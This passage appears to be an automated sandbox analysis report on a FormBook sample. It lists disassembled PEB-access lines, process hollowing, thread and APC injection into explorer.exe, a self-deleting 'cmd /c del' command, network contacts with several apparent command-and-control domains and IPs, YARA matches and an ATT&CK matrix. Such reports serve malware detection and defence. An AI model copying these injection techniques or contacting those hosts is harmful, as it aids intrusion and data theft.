            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049FC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A02581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A02581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A02581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A02581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A02990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A641E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A88DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049ED5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049ED5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A5A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A04D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A04D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A04D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049F4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049F4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049F4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049F4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049F4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049F7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049FB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049FB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A13D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A53540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049FC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049FC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A546A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A6FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049EAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049EAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A016E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A02AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A18EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A8FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A02ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A036CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049F3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A8FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A08E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A8B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A8B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A1927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049FAE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A64257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049E1B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A9138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A8D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A57794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A57794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A57794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A02397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A137F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A553CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A553CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049FF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A0A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A9131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049D4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A6FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A6FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DF358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A03B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04A03B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DDB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049EEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04AA8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049DDB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_049EFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.utformehagen.com
            Source: C:\Windows\explorer.exeDomain query: www.sdmdwang.com
            Source: C:\Windows\explorer.exeNetwork Connect: 104.168.135.142 80
            Source: C:\Windows\explorer.exeDomain query: www.sunilpsingh.com
            Source: C:\Windows\explorer.exeDomain query: www.tapdaugusta.com
            Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
            Source: C:\Windows\explorer.exeNetwork Connect: 45.39.95.186 80
            Source: C:\Windows\explorer.exeNetwork Connect: 74.206.228.78 80
            Source: C:\Windows\explorer.exeNetwork Connect: 107.165.13.75 80
            Source: C:\Windows\explorer.exeDomain query: www.regarta.com
            Source: C:\Windows\explorer.exeDomain query: www.advancedautorepairsonline.com
            Source: C:\Windows\explorer.exeDomain query: www.profitsnavigator.com
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeNetwork Connect: 112.213.96.11 80
            Source: C:\Windows\explorer.exeDomain query: www.konversationswithkoshie.net
            Source: C:\Windows\explorer.exeDomain query: www.lovertons.com
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3440
            Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3440
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 900000
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: explorer.exe, 00000002.00000000.346354887.0000000000EE0000.00000002.00000001.sdmp, cmmon32.exe, 00000005.00000002.605414493.0000000003270000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000002.00000000.345941626.00000000008B8000.00000004.00000020.sdmp, cmmon32.exe, 00000005.00000002.605414493.0000000003270000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000002.00000000.346354887.0000000000EE0000.00000002.00000001.sdmp, cmmon32.exe, 00000005.00000002.605414493.0000000003270000.00000002.00000001.sdmpBinary or memory string: &Program Manager
            Source: explorer.exe, 00000002.00000000.346354887.0000000000EE0000.00000002.00000001.sdmp, cmmon32.exe, 00000005.00000002.605414493.0000000003270000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeQueries volume information: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe VolumeInformation
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.9JzK89dRiaBYTuN.exe.3754088.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.9JzK89dRiaBYTuN.exe.35b0360.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.598731483.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.342547133.0000000003549000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.396448884.0000000001990000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.396143865.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.603676182.0000000002CC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.598176527.0000000000770000.00000040.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1Input Capture1Security Software Discovery221Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
